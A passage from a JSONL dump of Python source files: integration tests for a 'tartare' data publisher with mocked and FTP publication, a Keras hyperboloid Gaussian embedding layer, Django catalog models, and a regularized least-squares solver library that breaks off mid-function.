on ftp server are correct\n with tempfile.TemporaryDirectory() as tmp_dirname:\n transfered_full_name = os.path.join(tmp_dirname, \"transfered_file.zip\")\n with open(transfered_full_name, \"wb\") as dest_file:\n session.retrbinary(\n \"RETR {expected_filename}\".format(expected_filename=expected_filename), dest_file.write\n )\n session.delete(expected_filename)\n assert_files_equals(transfered_full_name, _get_file_fixture_full_path(export_fixture))\n session.quit()\n\n @mock.patch(\"tartare.core.publisher.Publisher.publish\")\n def test_publish_only_enabled(self, mock_pusblish):\n self.init_contributor(\"cid\", \"dsid1\", \"http://url.com\")\n self.add_data_source_to_contributor(\"cid\", \"dsid2\", \"http://url.com\")\n self.add_data_source_to_contributor(\"cid\", \"dsid3\", \"http://url.com\")\n self.add_data_source_to_contributor(\"cid\", \"dsid4\", \"http://url.com\")\n url = \"http://whatever.fr/pub\"\n publications = [\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"integration_yes\",\n \"enabled\": True,\n },\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid2\"],\n \"environment\": \"preproduction\",\n \"id\": \"preprod_no\",\n \"enabled\": False,\n },\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid3\"],\n \"environment\": \"preproduction\",\n \"id\": \"preprod_yes\",\n \"enabled\": True,\n },\n {\n \"url\": url,\n \"input_data_source_ids\": [\"dsid4\"],\n \"environment\": \"production\",\n \"id\": \"prod_no\",\n \"enabled\": False,\n },\n ]\n self.init_coverage(\"covid\", publications=publications)\n self.coverage_export(\"covid\")\n # only enabled called\n assert mock_pusblish.call_count == 2\n assert mock_pusblish.call_args_list[0][0][0] == [\"dsid1\"]\n assert mock_pusblish.call_args_list[1][0][0] == [\"dsid3\"]\n\n def test_publish_unknown_coverage(self):\n raw = self.publish(\"unknown\", check_success=False)\n self.assert_failed_call(raw, 404)\n\n def test_publish_unknown_publications(self):\n self.init_coverage(\"covid\")\n self.add_data_source_to_coverage(\"covid\", \"dsid1\", \"http://url1.com\")\n raw = self.publish(\"covid\", publication_ids=[\"unknown\"], check_success=False)\n details = self.assert_failed_call(raw, 400)\n assert details == {\"error\": \"coverage covid does not contain any publications\", \"message\": \"Invalid arguments\"}\n self.add_publication_platform_to_coverage(\n {\n \"url\": \"http://whatever.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"existing_pub\",\n },\n \"covid\",\n )\n raw = self.publish(\"covid\", publication_ids=[\"unexisting_pub\"], check_success=False)\n details = self.assert_failed_call(raw, 400)\n assert details == {\n \"error\": \"no publications found matching provided publication_ids\",\n \"message\": \"Invalid arguments\",\n }\n self.init_coverage(\"covid2\")\n self.add_publication_platform_to_coverage(\n {\n \"url\": \"http://whatever.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"existing_pub_disabled\",\n \"enabled\": False,\n },\n \"covid2\",\n )\n raw = self.publish(\"covid2\", check_success=False)\n details = self.assert_failed_call(raw, 400)\n assert details == {\"error\": \"no publications enabled found for coverage covid2\", \"message\": \"Invalid arguments\"}\n\n @mock.patch(\"tartare.tasks.coverage_publication.si\")\n def test_publish_action(self, mock_pusblish_task):\n self.init_contributor(\"cid\", \"dsid1\", \"http://url1.com\")\n self.init_coverage(\n \"covid\",\n publications=[\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_1\",\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_2\",\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_3\",\n \"enabled\": False,\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_4\",\n },\n {\n \"url\": \"http://url.com\",\n \"input_data_source_ids\": [\"dsid1\"],\n \"environment\": \"integration\",\n \"id\": \"pub_5\",\n },\n ],\n )\n # filter 3 publications but one of them is not enabled\n self.publish(\"covid\", publication_ids=[\"pub_1\", \"pub_3\", \"pub_5\"])\n assert len(mock_pusblish_task.call_args_list[0][0][1]) == 2\n assert [pub.id for pub in mock_pusblish_task.call_args_list[0][0][1]] == [\"pub_1\", \"pub_5\"]\n job = mock_pusblish_task.call_args_list[0][0][0]\n assert job.action_type == \"coverage_publication\"\n assert job.coverage_id == \"covid\"\n # filter 3 publications but one of them is not enabled and one of them is unknown\n self.publish(\"covid\", publication_ids=[\"pub_1\", \"pub_3\", \"unknown\"])\n assert len(mock_pusblish_task.call_args_list[1][0][1]) == 1\n assert [pub.id for pub in mock_pusblish_task.call_args_list[1][0][1]] == [\"pub_1\"]\n # filter no publications\n self.publish(\"covid\")\n assert len(mock_pusblish_task.call_args_list[2][0][1]) == 4\n\n def test_publish_ftp_with_action(self, wiremock_server, init_ftp_upload_server):\n contributor_id = \"fr-idf\"\n coverage_id = \"default\"\n filename = \"some_archive.zip\"\n url = self.format_url(ip=wiremock_server.ip_addr, filename=filename)\n self.init_contributor(contributor_id, \"dsid\", url)\n publication_platform = {\n \"environment\": \"production\",\n \"url\": \"ftp://\" + init_ftp_upload_server.ip_addr,\n \"input_data_source_ids\": [\"dsid\"],\n \"options\": {\n \"authent\": {\"username\": init_ftp_upload_server.user, \"password\": init_ftp_upload_server.password}\n },\n }\n self.init_coverage(coverage_id, publications=[publication_platform])\n\n self.contributor_export(contributor_id)\n job = self.publish(coverage_id)\n assert job[\"state\"] == \"done\"\n assert job[\"coverage_id\"] == coverage_id\n assert job[\"action_type\"] == \"coverage_publication\"\n assert job[\"step\"].startswith(\"publish_data production on ftp://{}\".format(init_ftp_upload_server.ip_addr))\n assert job == self.get_coverage(coverage_id)[\"last_job\"]\n\n @mock.patch(\"requests.post\", side_effect=[get_response(200), get_response(500), get_response(200)])\n def test_publish_crash_breaks_chain(self, mock_pusblish, wiremock_server):\n self.init_contributor(\"cid\", \"dsid1\", self.format_url(wiremock_server.ip_addr, \"some_archive.zip\"))\n url = \"http://whatever.fr/pub\"\n publications = [\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"integration\", \"id\": \"integration_yes\"},\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"preproduction\", \"id\": \"preprod_no\"},\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"preproduction\", \"id\": \"preprod_yes\"},\n {\"url\": url, \"input_data_source_ids\": [\"dsid1\"], \"environment\": \"production\", \"id\": \"prod_no\"},\n ]\n self.contributor_export(\"cid\")\n self.init_coverage(\"covid\", publications=publications)\n job = self.publish(\"covid\")\n assert mock_pusblish.call_count == 3\n assert job[\"state\"] == \"failed\"\n","sub_path":"tests/integration/mongo/data_publisher_test.py","file_name":"data_publisher_test.py","file_ext":"py","file_size_in_byte":30454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"450567200","text":"import numpy as np\n\nimport keras.backend as K\nfrom keras.layers import Input, Layer, Concatenate\nfrom keras.models import Model\nfrom keras.initializers import Constant, RandomNormal\nfrom keras.regularizers import l2\n\nimport tensorflow as tf\n\nimport functools\n\ndef kullback_leibler_divergence(mus, sigmas):\n\n\t# ignore zero t coordinate\n\tmus = mus[...,:-1]\n\n\t# source_mus, target_mus = mus[:,:1], mus[:,1:]\n\n\tk = K.int_shape(mus)[-1]\n\n\tsigmas = K.maximum(sigmas, K.epsilon())\n\n\tsource_sigma = sigmas[:,:1]\n\ttarget_sigma = sigmas[:,1:]\n\n\tsigma_ratio = target_sigma / source_sigma\n\tsigma_ratio = K.maximum(sigma_ratio, K.epsilon())\n\n\ttrace_fac = K.sum(sigma_ratio,\n\t\taxis=-1, keepdims=True)\n\n\t# mu_sq_diff = K.sum(K.square(target_mus - source_mus) / \\\n\t# \tsource_sigma,\n\t# \taxis=-1, keepdims=True) # assume sigma is diagonal\n\tmu_sq_diff = K.sum(K.square(mus) / \\\n\t\tsource_sigma,\n\t\taxis=-1, keepdims=True) # assume sigma is diagonal\n\n\tlog_det = K.sum(K.log(sigma_ratio),\n\t\taxis=-1, keepdims=True)\n\n\treturn 0.5 * (trace_fac + mu_sq_diff - k - log_det)\n\ndef minkowski_dot(x, y):\n\tassert len(x.shape) == len(y.shape)\n\treturn K.sum(x[...,:-1] * y[...,:-1], axis=-1, keepdims=True) - x[...,-1:] * y[...,-1:]\n\ndef minkowski_norm(x):\n\treturn K.sqrt(K.maximum(\n\t\tminkowski_dot(x, x), 0.))\n\ndef parallel_transport(p, q, x):\n\talpha = -minkowski_dot(p, q)\n\talpha = K.maximum(alpha, 1+K.epsilon())\n\n\treturn x + minkowski_dot(q - alpha * p, x) * (p + q) / \\\n\t\tK.maximum(alpha + 1, K.epsilon())\n\ndef logarithmic_map(p, x):\n\tassert len(p.shape) == len(x.shape)\n\n\talpha = -minkowski_dot(p, x)# + K.epsilon()\n\n\talpha = K.maximum(alpha, 1 + K.epsilon())\n\n\tret = tf.acosh(alpha) * (x - alpha * p) / \\\n\t\tK.maximum(K.sqrt(K.maximum(alpha ** 2 - 1., 0.)),\n\t\tK.epsilon())\n\n\treturn ret\n\ndef hyperboloid_initializer(shape, r_max=1e-5):\n\n\tdef poincare_ball_to_hyperboloid(X, append_t=True):\n\t\tx = 2 * X\n\t\tt = 1. + K.sum(K.square(X), axis=-1, keepdims=True)\n\t\tif append_t:\n\t\t\tx = K.concatenate([x, t], axis=-1)\n\t\treturn 1 / (1. - K.sum(K.square(X), axis=-1, keepdims=True)) * x\n\n\tw = tf.random_uniform(shape=shape, \n\t\tminval=-r_max, \n\t\tmaxval=r_max, \n\t\tdtype=K.floatx())\n\treturn poincare_ball_to_hyperboloid(w)\n\nclass HyperboloidGaussianEmbeddingLayer(Layer):\n\n\tdef __init__(self,\n\t\tnum_nodes,\n\t\tembedding_dim,\n\t\t**kwargs):\n\t\tsuper(HyperboloidGaussianEmbeddingLayer, self).__init__(**kwargs)\n\t\tself.num_nodes = num_nodes\n\t\tself.embedding_dim = embedding_dim\n\t\tself.mu_zero = K.constant(\\\n\t\t\tnp.append(np.zeros((1, 1, self.embedding_dim)), \n\t\t\t\tnp.ones((1,1,1)), axis=-1))\n\n\tdef build(self, input_shape):\n\t\t# Create a trainable weight variable for this layer.\n\t\tself.embedding = self.add_weight(name='hyperbolic_embedding',\n\t\t\tshape=(self.num_nodes, self.embedding_dim),\n\t\t\tinitializer=hyperboloid_initializer,\n\t\t\ttrainable=True)\n\t\tassert self.embedding.shape[1] == self.embedding_dim + 1\n\t\tself.sigmas = self.add_weight(name='euclidean_covariance',\n\t\t\tshape=(self.num_nodes, self.embedding_dim),\n\t\t\tinitializer=functools.partial(\n\t\t\t\ttf.random_normal, \n\t\t\t\tstddev=1e-3,\n\t\t\t\tdtype=K.floatx()),\n\t\t\tregularizer=l2(1e-4),\n\t\t\ttrainable=True)\n\t\tsuper(HyperboloidGaussianEmbeddingLayer, self).build(input_shape)\n\n\tdef call(self, idx):\n\n\t\tsource_embedding = tf.gather(self.embedding, \n\t\t\tidx[:,:1])\n\t\ttarget_embedding = tf.gather(self.embedding, \n\t\t\tidx[:,1:])\n\n\t\tto_tangent_space = logarithmic_map(\n\t\t\tsource_embedding,\n\t\t\ttarget_embedding)\n\n\t\tto_tangent_space_mu_zero = parallel_transport(\n\t\t\tsource_embedding,\n\t\t\tself.mu_zero,\n\t\t\tto_tangent_space)\n\n\t\tsigmas = tf.gather(self.sigmas, idx)\n\n\t\tsigmas = K.elu(sigmas) + 1.\n\n\t\tkds = kullback_leibler_divergence(\n\t\t\tmus=to_tangent_space_mu_zero,\n\t\t\tsigmas=sigmas)\n\n\t\tkds = K.squeeze(kds, axis=-1)\n\n\t\treturn kds\n\n\tdef compute_output_shape(self, input_shape):\n\t\treturn (input_shape[0], input_shape[1] - 1, )\n\n\tdef get_config(self):\n\t\tbase_config = super(HyperboloidGaussianEmbeddingLayer,\n\t\t\tself).get_config()\n\t\tbase_config.update({\"num_nodes\": self.num_nodes,\n\t\t\t\"embedding_dim\": self.embedding_dim})\n\t\treturn base_config","sub_path":"hednet/hyperboloid_layers.py","file_name":"hyperboloid_layers.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"348812108","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom utils.models import TimeStampedModel, SlugFromTitleModel\nfrom .managers import ProductManager\n\n\n\nclass Category(SlugFromTitleModel, MPTTModel):\n parent = TreeForeignKey(\n 'self', \n on_delete=models.CASCADE, \n blank=True, \n null=True, \n related_name='children',\n verbose_name=_('parent')\n )\n\n class Meta: \n verbose_name = _('category')\n verbose_name_plural = _('categories')\n \n class MPTTMeta:\n level_attr = 'mptt_level'\n order_insertion_by=['title']\n\n def __str__(self):\n return self.title\n\n\n\nclass Product(TimeStampedModel, SlugFromTitleModel):\n price = models.DecimalField(_('price'), max_digits=12, decimal_places=2)\n description = models.TextField(_('description'), blank=True, default='Description is not provided')\n active = models.BooleanField(_('active'), default=True)\n featured = models.BooleanField(_('featured'), default=False)\n category = models.ForeignKey(\n 'catalog.Category', \n on_delete=models.SET_NULL, \n null=True,\n related_name='products',\n verbose_name = _('related categories')\n )\n extra = models.JSONField(_('extra attributes as JSON'), null=True, blank=True)\n objects = ProductManager()\n\n def __str__(self):\n return self.title\n\n\n\ndef build_image_path(instance, filename):\n # file will be uploaded to MEDIA_ROOT/uploads/images//\n return 'uploads/images/{0}/{1}'.format(instance.product.title, filename)\n\n\n\nclass ProductImage(models.Model):\n src = models.ImageField(\n _('source'),\n upload_to=build_image_path, \n unique=True,\n help_text=_('Image file that will be available via URL after upload')\n )\n product = models.ForeignKey(\n 'catalog.Product', \n related_name='images', \n on_delete=models.CASCADE, \n verbose_name=_('product')\n )\n alt = models.CharField(\n _('image description'),\n max_length=255, \n null=True, \n blank=True,\n help_text=_('It\\'s used as plain text when image is not shown')\n )\n is_showcase = models.BooleanField(\n _('is showcase'), \n default=False, \n help_text=_('This image is for showcase purposes and should be unique per product')\n )\n\n class Meta:\n verbose_name=_('Product Image')\n verbose_name_plural=_('Product Images')\n\n def __str__(self):\n return f'{self.product.title} ({self.id})' \n \n\n\n\n","sub_path":"apps/catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161701493","text":"from math import sqrt\r\nimport numpy as np\r\nfrom numpy import atleast_1d, atleast_2d\r\nfrom scipy.linalg import qr, solve_triangular\r\nfrom scipy.linalg.decomp import _asarray_validated\r\nfrom scipy.linalg.misc import LinAlgError\r\n\r\n# Author : Rondall E. Jones, December 2020\r\n\r\n\r\ndef checkAb(A, b, maxcols):\r\n if len(A.shape) != 2:\r\n raise LinAlgError(\"Input array should be 2-D.\")\r\n m, n = A.shape\r\n if m == 0 or n == 0:\r\n raise LinAlgError(\"Matrix is empty.\")\r\n if b.shape[0] != m:\r\n raise LinAlgError(\r\n \"Matrix and RHS do not have the same number of rows.\")\r\n if maxcols < 2 and len(b.shape) > 1:\r\n raise LinAlgError(\r\n \"Right hand side must have only one column.\")\r\n return\r\n\r\n\r\ndef mynorm(x):\r\n return sqrt(np.dot(x, x))\r\n\r\n\r\ndef myrms(x):\r\n return sqrt(np.dot(x, x)) / sqrt(len(x))\r\n\r\n\r\ndef decide_width(mg):\r\n if mg < 3:\r\n return 1\r\n elif mg <= 8: # 4 spans\r\n return 2\r\n elif mg <= 20: # 5 spans\r\n return 4\r\n elif mg <= 36: # 6 spans\r\n return 6\r\n elif mg <= 64: # 8 spans\r\n return 8\r\n elif mg <= 100: # 10 spans\r\n return 10\r\n else:\r\n w = int(mg / 10)\r\n return 2 * int(w / 2) # 10 spans\r\n\r\n\r\ndef splita(g, mg):\r\n \"\"\" Determines a usable rank based on large rise in Picard Vector\"\"\"\r\n # initialize\r\n if mg < 2:\r\n return mg\r\n w = decide_width(mg)\r\n sensitivity = g[0]\r\n small = sensitivity\r\n local = sensitivity\r\n urank = 1\r\n for i in range(1, mg):\r\n sensitivity = g[i]\r\n if i >= w and sensitivity > 25.0 * small and sensitivity > local:\r\n break\r\n if sensitivity < small:\r\n small = small + 0.40 * (sensitivity - small)\r\n else:\r\n small = small + 0.10 * (sensitivity - small)\r\n local = local + 0.40 * (sensitivity - local)\r\n urank = i + 1\r\n return urank\r\n\r\n\r\ndef compute_mov_sums(g, mg, w): # REORDER ARGS LIKE GOlang\r\n numsums = mg - w + 1\r\n sums = np.zeros(numsums)\r\n for i in range(0, numsums):\r\n s = 0.0\r\n for j in range(i, i + w):\r\n s += g[j]\r\n sums[i] = s\r\n return sums\r\n\r\n\r\ndef splitb(g, mg):\r\n \"\"\" Determines a usable rank based on modest rise in Picard Vector\r\n after the low point in the PCV.\"\"\"\r\n w = decide_width(mg)\r\n if w < 2:\r\n return mg # splitb needs w>=2 to be reliable\r\n\r\n # magnify any divergence by squaring\r\n gg = np.zeros(mg)\r\n for i in range(0, mg):\r\n gg[i] = g[i] * g[i]\r\n\r\n # ignore dropouts\r\n for i in range(1, mg - 1):\r\n if gg[i] < 0.2 * gg[i - 1] and gg[i] < 0.2 * gg[i + 1]:\r\n gg[i] = 0.5 * min(gg[i - 1], gg[i + 1])\r\n\r\n # choose breakpoint as multiple of lowest moving average\r\n sums = compute_mov_sums(gg, mg, w)\r\n ilow = np.where(sums == min(sums))[0][0]\r\n bad = 20.0 * sums[ilow]\r\n\r\n # look for unexpected rise\r\n ibad = 0\r\n for i in range(ilow + 1, mg - w + 1):\r\n if sums[i] > bad:\r\n ibad = i\r\n break\r\n if ibad <= 0:\r\n urank = mg # leave urank alone\r\n else:\r\n urank = ibad + w - 1\r\n\r\n return urank\r\n\r\n\r\ndef rmslambdah(A, b, U, S, Vt, ur, lamb):\r\n \"\"\" Computes a regularized solution to Ax=b, given the usable rank\r\n and the Tikhonov lambda value.\"\"\"\r\n mn = S.shape[0]\r\n ps = np.zeros(mn)\r\n for i in range(0, ur):\r\n ps[i] = 1.0 / (S[i] + lamb ** 2 / S[i]) if S[i] > 0.0 else 0.0\r\n for i in range(ur, mn):\r\n ps[i] = 0.0\r\n # best to do multiplies from right end....\r\n xa = np.transpose(Vt) @ (np.diag(ps) @ (np.transpose(U) @ b))\r\n res = b - A @ xa\r\n r = myrms(res)\r\n return xa, r\r\n\r\n\r\ndef discrep(A, b, U, S, Vt, ur, mysigma):\r\n \"\"\" Computes Tikhonov's lambda using b's estimated RMS error, mysigma\"\"\"\r\n lo = 0.0 # for minimum achievable residual\r\n hi = 0.33 * float(S[0]) # for ridiculously large residual\r\n lamb = 0.0\r\n # bisect until we get the residual we want...but quit eventually\r\n for k in range(0, 50):\r\n lamb = (lo + hi) * 0.5\r\n xa, check = rmslambdah(A, b, U, S, Vt, ur, lamb)\r\n if abs(check - mysigma) < 0.0000001 * mysigma:\r\n break # close enough!\r\n if check > mysigma:\r\n hi = lamb\r\n else:\r\n lo = lamb\r\n return lamb\r\n\r\n\r\ndef arlsusv(A, b, U, S, Vt):\r\n \"\"\" core solver when SVD is already available \"\"\"\r\n if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n m, n = A.shape\r\n mn = min(m, n)\r\n # compute contributions to norm of solution\r\n beta = np.transpose(U) @ b\r\n k = 0\r\n g = np.zeros(mn)\r\n sense = 0.0\r\n si = 0.0\r\n cond = max(A.shape) * np.spacing(A.real.dtype.type(1))\r\n eps = S[0] * cond\r\n for i in range(0, mn):\r\n si = S[i]\r\n if si <= eps:\r\n break\r\n sense = beta[i] / si\r\n if sense < 0.0:\r\n sense = -sense\r\n g[i] = sense\r\n k = i + 1\r\n nr = k # traditional numeric rank\r\n if k <= 0:\r\n return np.zeros(n), 0, 0, 0.0, 0.0 # failsave check\r\n\r\n # two-stage search for divergence in Picard Condition Vector\r\n ura = splita(g, k)\r\n urb = splitb(g, ura)\r\n ur = min(ura, urb)\r\n if ur >= mn:\r\n # problem is not ill-conditioned\r\n x, check = rmslambdah(A, b, U, S, Vt, ur, 0.0)\r\n sigma = 0.0\r\n lambdah = 0.0\r\n else:\r\n # from ur, determine sigma\r\n Utb = np.transpose(U) @ b\r\n sigma = myrms(Utb[ur:mn])\r\n # from sigma, determine lambda\r\n lambdah = discrep(A, b, U, S, Vt, ur, sigma)\r\n # from lambda, determine solution\r\n x, check = rmslambdah(A, b, U, S, Vt, ur, lambdah)\r\n return x, nr, ur, sigma, lambdah\r\n\r\n\r\ndef arls(A, b):\r\n \"\"\"Solves the linear system of equation, Ax = b, for any shape matrix.\r\n\r\n The system can be underdetermined, square, or over-determined.\r\n That is, A(m,n) can be such that m < n, m = n, or m > n.\r\n Argument b is a matrix of size(m,p) of p right-hand-side columns.\r\n This solver automatically detects if each system is ill-conditioned or not.\r\n\r\n Then\r\n -- If the equations are consistent then the solution will usually be\r\n exact within round-off error.\r\n -- If the equations are inconsistent then the the solution will be\r\n by least-squares. That is, it solves ``min ||b - Ax||_2``.\r\n -- If the equations are inconsistent and diagnosable as ill-conditioned\r\n using the principles of the first reference below, the system will be\r\n automatically regularized and the residual will be larger than minimum.\r\n -- If either A or b is all zeros then the solution will be all zeros.\r\n\r\n Parameters\r\n ----------\r\n A : (m, n) array_like\r\n Coefficient matrix\r\n b : (m, p) array_like\r\n Set of columns of dependent variables.\r\n\r\n Returns\r\n -------\r\n x : (n, p) array_like set of columns, type float.\r\n Each column will be the solution corresponding to a column of b.\r\n nr : int\r\n The Numerical Rank of A.\r\n mur : int\r\n The Minimum Usable Rank seen in solving all the problems.\r\n Note that \"numerical rank\" is an attribute of a matrix\r\n but the \"usable rank\" that arls computes is an attribute\r\n of the problem, Ax=b.\r\n msigma : float\r\n The largest estimated right-hand-side root-mean-square error seen.\r\n mlambda : float\r\n The largest estimated Tikhonov regularization parameter seen.\r\n\r\n Raises\r\n ------\r\n LinAlgError\r\n If A is not 2-D.\r\n If A is empty.\r\n If A and b do not have the same row size.\r\n If b has more than one column.\r\n If SCIPY's SVD() does not converge.\r\n\r\n Examples\r\n --------\r\n Arls() will behave like any good least-squares solver when the system\r\n is well conditioned.\r\n Here is a tiny example of an ill-conditioned system as handled by arls(),\r\n\r\n x + y = 2\r\n x + 1.01 y =3\r\n\r\n Then A = array([[ 1., 1.],\r\n [ 1., 1.01.]])\r\n and b = array([2.0, 3.0])\r\n\r\n Then standard solvers will return:\r\n x = [-98. , 100.]\r\n\r\n But arls() will see the violation of the Picard Condition and return\r\n x = [1.12216 , 1.12779]\r\n\r\n Notes:\r\n -----\r\n 1. When the system is ill-conditioned, the process works best when the rows\r\n of A are scaled so that the elements of b have similar estimated errors.\r\n 2. Arls() occasionally may produce a smoother (i.e., more regularized)\r\n solution than desired. In this case please try scipy routine lsmr.\r\n 3. With any linear equation solver, check that the solution is reasonable.\r\n In particular, you should check the residual vector, Ax - b.\r\n 4. Arls() neither needs nor accepts optional parameters such as iteration\r\n limits, error estimates, variable bounds, condition number limits, etc.\r\n It also does not return any error flags as there are no error states.\r\n As long as the SVD converges (and SVD failure is remarkably rare)\r\n then arls() and other routines in this package will complete normally.\r\n 5. Arls()'s intent (and the intent of all routines in this module)\r\n is to find a reasonable solution even in the midst of excessive\r\n inaccuracy, ill-conditioning, singularities, duplicated data, etc.\r\n Its performance is often very like that of lsmr, but from a completely\r\n different approach.\r\n 6. In view of note 5, arls() is not appropriate for situations\r\n where the requirements are more for high accuracy rather than\r\n robustness. So, we assume, in the coding, where needed, that no data\r\n needs to be considered more accurate than 8 significant figures.\r\n\r\n References\r\n ----------\r\n The auto-regularization algorithm in this software arose from the research\r\n for my dissertation, \"Solving Linear Algebraic Systems Arising in the\r\n Solution of Integral Equations of the First Kind\", University of\r\n New Mexico, Albuquerque, NM, 1985.\r\n\r\n Many thanks to Cleve B. Moler, MatLab creater and co-founder of MathWorks\r\n for his energy and insights in guiding my dissertation research.\r\n\r\n My thanks also to Richard Hanson (deceased), co-author of the classic\r\n \"Solving Least Squares Problems\", co-creater of BLAS, and co-advisor\r\n for the last year of my dissertation work.\r\n\r\n My thanks also to Per Christian Hansen for reviewing an early version\r\n of this software which resulted in my creating the crucial two-phase\r\n matrix \"split\" process.\r\n\r\n And my thanks to the central computing department at Sandia National Labs\r\n where I had the opportunity to contribute to the \"MATHLIB\" Fortran library\r\n in the 1960's and 1970's. MATLIB evolved into part of the\r\n Fortran \"SLATEC\" library.\r\n See http://www.netlib.org/slatec/src/\r\n\r\n For for a short presentation on the Picard Condition which is at the heart\r\n of this package's algorithms, please see\r\n See www.rejones7.net/Arls/What_Is_The_Picard_Condition.htm\r\n\r\n For a complete description, see \"The Discrete Picard Condition for Discrete\r\n Ill-posed Problems\", Per Christian Hansen, 1990.\r\n See link.springer.com/article/10.1007/BF01933214\r\n\r\n For discussion of incorporating equality and inequality constraints\r\n (including nonnegativity) in solving linear algebraic problems, see\r\n \"Solving Least Squares Problems\", by Charles L. Lawson and\r\n Richard J. Hanson, Prentice-Hall 1974.\r\n My implementation of these features has evolved somewhat\r\n from that fine book, but is based on those algorithms.\r\n\r\n Rondall E. Jones, Ph.D.\r\n rejones7@msn.com\r\n \"\"\"\r\n A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n checkAb(A, b, 2)\r\n m, n = A.shape\r\n nrhs = 1\r\n if len(b.shape) == 2:\r\n nrhs = b.shape[1]\r\n\r\n U, S, Vt = np.linalg.svd(A, full_matrices=False)\r\n\r\n # one right hand side\r\n if nrhs == 1:\r\n return arlsusv(A, b, U, S, Vt)\r\n\r\n # multiple right hand sides\r\n xx = np.zeros((n, nrhs))\r\n nr = min(A.shape)\r\n mur = nr # track minimum usable rank\r\n msigma = 0.0 # track maximum estimated RHS error\r\n mlamda = 0.0 # track maximum Tikhonov parameter\r\n for p in range(0, nrhs):\r\n xx[:, p], nr, ur, sigma, lambdah = arlsusv(A, b[:, p], U, S, Vt)\r\n mur = min(mur, ur)\r\n msigma = max(msigma, sigma)\r\n mlamda = max(mlamda, lambdah)\r\n return xx, nr, mur, msigma, mlamda\r\n\r\n\r\ndef strange(A, b):\r\n \"\"\"determines whether the A*x=b is likely ill-conditioned.\"\"\"\r\n m, n = A.shape\r\n epsilon = 10.0 * max(m, n) * np.spacing(b.real.dtype.type(1))\r\n rn = np.zeros(m)\r\n for k in range(0, m):\r\n rn[k] = mynorm(A[k, :])\r\n tol = max(rn) * epsilon\r\n odd = False\r\n for k in range(0, m):\r\n if rn[k] < tol:\r\n rn[k] = tol\r\n odd = True\r\n bb = abs(b)/rn\r\n maxnorm = mynorm(bb) * 1.5\r\n return odd, maxnorm\r\n\r\n\r\ndef arlsqr(A, b):\r\n \"\"\"Solves the linear system of equation, Ax = b, for any shape matrix.\r\n\r\n Arlsqr() is called exactly like arls() above, and the returns are\r\n exactly the same.\r\n\r\n The difference is that if b is only one column then arlsqr()\r\n first performs a quick assessment of the system to see if it appears\r\n to be ill-conditioned. If not, qr() is called for a solution.\r\n If the resulting solution from qr() appears to be good, then it\r\n is returned. Otherwise, arls() continues itself to to get a solution\r\n based on the SVD.\r\n\r\n The purpose of this difference is to execute signficantly faster than\r\n arlsqr() does if the problems given to it are usually well behaved.\r\n \"\"\"\r\n A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n nz = np.count_nonzero(A)\r\n if nz == 0 or np.count_nonzero(b) == 0:\r\n return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n checkAb(A, b, 2)\r\n m, n = A.shape\r\n nr = min(m, n)\r\n # is b a single column?\r\n if len(b.shape) > 1:\r\n return arls(A, b)\r\n odd, maxnorm = strange(A, b)\r\n if not odd or nz < int((m*n)/2): # max norm tests fails for sparse-like\r\n if (m >= n):\r\n Q, R = qr(A, mode='economic')\r\n Qb = Q.T @ b\r\n try:\r\n x = solve_triangular(R, Qb)\r\n except LinAlgError:\r\n return arls(A, b)\r\n else:\r\n Q, R = qr(A.T, mode='economic')\r\n try:\r\n y = solve_triangular(R, b, 'T')\r\n except LinAlgError:\r\n return arls(A, b)\r\n x = Q @ y\r\n if mynorm(x) < maxnorm or nz < int((m*n)/2):\r\n return x, nr, nr, 0.0, 0.0\r\n return arls(A, b)\r\n\r\n\r\ndef find_max_row_norm(A):\r\n \"\"\" determine max row norm of A \"\"\"\r\n m = A.shape[0]\r\n rnmax = 0.0\r\n for i in range(0, m):\r\n rn = mynorm(A[i, :])\r\n if rn > rnmax:\r\n rnmax = rn\r\n return rnmax\r\n\r\n\r\ndef find_max_sense(E, f):\r\n \"\"\" find the row of Ex=f which his the highest ratio of f[i]\r\n to the norm of the row. \"\"\"\r\n snmax = -1.0\r\n ibest = 0 # default\r\n m = E.shape[0]\r\n for i in range(0, m):\r\n rn = mynorm(E[i, :])\r\n if rn > 0.0:\r\n s = abs(f[i]) / rn\r\n if s > snmax:\r\n snmax = s\r\n ibest = i\r\n return ibest\r\n\r\n\r\ndef prepeq(E, f, neglect):\r\n \"\"\" a utility routine for arlseq() below that prepares the equality\r\n constraints for use\"\"\"\r\n E = 